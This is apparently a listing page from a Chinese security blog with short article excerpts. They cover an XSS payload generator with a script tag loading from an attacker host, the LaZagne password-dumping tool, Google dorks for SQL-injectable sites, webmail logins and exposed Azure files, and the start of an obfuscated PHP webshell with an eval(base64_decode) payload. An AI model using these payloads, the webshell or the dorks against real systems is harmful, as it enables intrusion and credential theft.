搜索 “bvi”

不再关注网络安全

跨站脚本XSS Payloads生成器

跨站脚本XSS Payloads生成器

xss_payloads xss_payloads是一个基于PHP的跨站脚本XSS Payloads生成器。 用法 在您的应用中找到XSS vuln获取PoC漏洞:alert(1) 等等在某处托管这些payloads使用vuln将其中一个payloads拉入应用程序 <script src="http://attackerip/file.js"></script>利用 js vs php文件 一些文件是纯JavaScript.js文...

LaZagne:获取保存在本地的帐户密码,支持浏览器|数据库|邮件|无线|管理员等等

LaZagne:获取保存在本地的帐户密码,支持浏览器|数据库|邮件|无线|管理员等等

LaZagne介绍 LaZagne是一个用于获取保存在本地计算机中帐户密码的项目。每个软件使用不同的技术(明文,API,自定义算法,数据库等)存储其密码,该工具的开发目的是为最常用的软件找到这些帐户密码。它可以在Windows和Linux主机上运行。 LaZagne支持类型 LaZagne找到本地帐户密码 LaZagne安装 LaZagne支持跨平台使用,...

AndroidHttpCapture:一款Android手机抓包软件

AndroidHttpCapture:一款Android手机抓包软件

AndroidHttpCapture网络诊断工具 AndroidHttpCapture是一款针对于移动流量劫持而开发的手机抓包软件,可以当作是Android版的Fiddler,主要功能包括:手机端抓包,PING/DNS/TraceRoute诊断、抓包HAR数据上传分享,使用前请确保手机HTTP代理的关闭。 AndroidHttpCapture运行的行为 HTTPS抓包第一次进入程序需要安装CA证书以便进行HTT...

inurl:core.windows.net ext:xlsx

  • 2017-05-24
  • shdb
  • 1323 阅读

Google Dork for Azure Blob Container files publically available. Obviously you can change the file extension or run without the extension howver it yields more precise results 🙂 Al

网络安全 : 百年大计

网络安全 : 百年大计

  • 2016-08-09
  • 周边
  • 2740 阅读

网络安全 网络安全(英语:Network security)包含网络设备安全、网络信息安全、网络软件安全。 中文名:网络安全 英文名:Network Security 释义:维护网络系统上的信息安全 危机:黑客入侵防不胜防 关联:计算机、通信、数学、信息安全等 类别:网络环境 黑客通过基于网络的入侵来达到窃取敏感信息的目的,也有人以基于网络的...

Medium的CSS 方案:简直完美

Medium的CSS 方案:简直完美

  • 2016-08-09
  • 前端
  • 3168 阅读

不管是气质、穿着还是行为,我总是想要做到最好。就算是我扔进垃圾桶的垃圾,也要比其他人扔的东西好。 — Lil Wayne 下面是我们把Medium的CSS代码一步步优化的过程,对于我们是如何做成现在这样、以及今后的规划,都可以在下文中略见一斑。 初识阶段(一点小历史) 大约2年前我加入了Obvious公司,参与 medium.com 的产品开发中来。那时,Me...

Google SQL 注入搜索列表

Google SQL 注入搜索列表

  • 2016-07-30
  • 周边
  • 3.6万 阅读

Google Dorks For SQL Injection 这是一个Google注入查询列表(傻瓜式),更新于2015年;根据一些关键字和URL结构,可批量查询出存在安全隐患的站点。 inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= ...

inurl:dynamic.php?page=mailbox

  • 2016-04-14
  • shdb
  • 1260 阅读

# Exploit Title: Webmail login pages # Google Dork: inurl:dynamic.php?page=mailbox # Date: 04/14/2016 # Author: Stephanie Jensen Summary webmail login pages - many with obvious usernames in search results. Login attempts seem unlimited.

Crack8_PHP webshell

Crack8_PHP webshell

PHP <?php /** * Created by uedbox.com. * User: hackgyj * Date: 15/10/28 * Time: 下午8:59 */ $admin['pass'] = "lqx"; //设置密码 $notice = "<FONT color=#ff3300>Crack8_PHP木马</font>"; //设置版权 eval(gzuncompress(base64_decode("eJzsffl3G8eR8M/0e/4fRhOuAJog...

intitle:"index of" "onetoc2" "one"

  • 2015-06-04
  • shdb
  • 1262 阅读

# Exploit Title: intitle:"index of" "onetoc2" "one" # Google Dork: intitle:"index of" "onetoc2" "one" # Date: 04/06/2015 # Exploit Author: Sphearis # Vendor Homepage: NA # Software Link: ...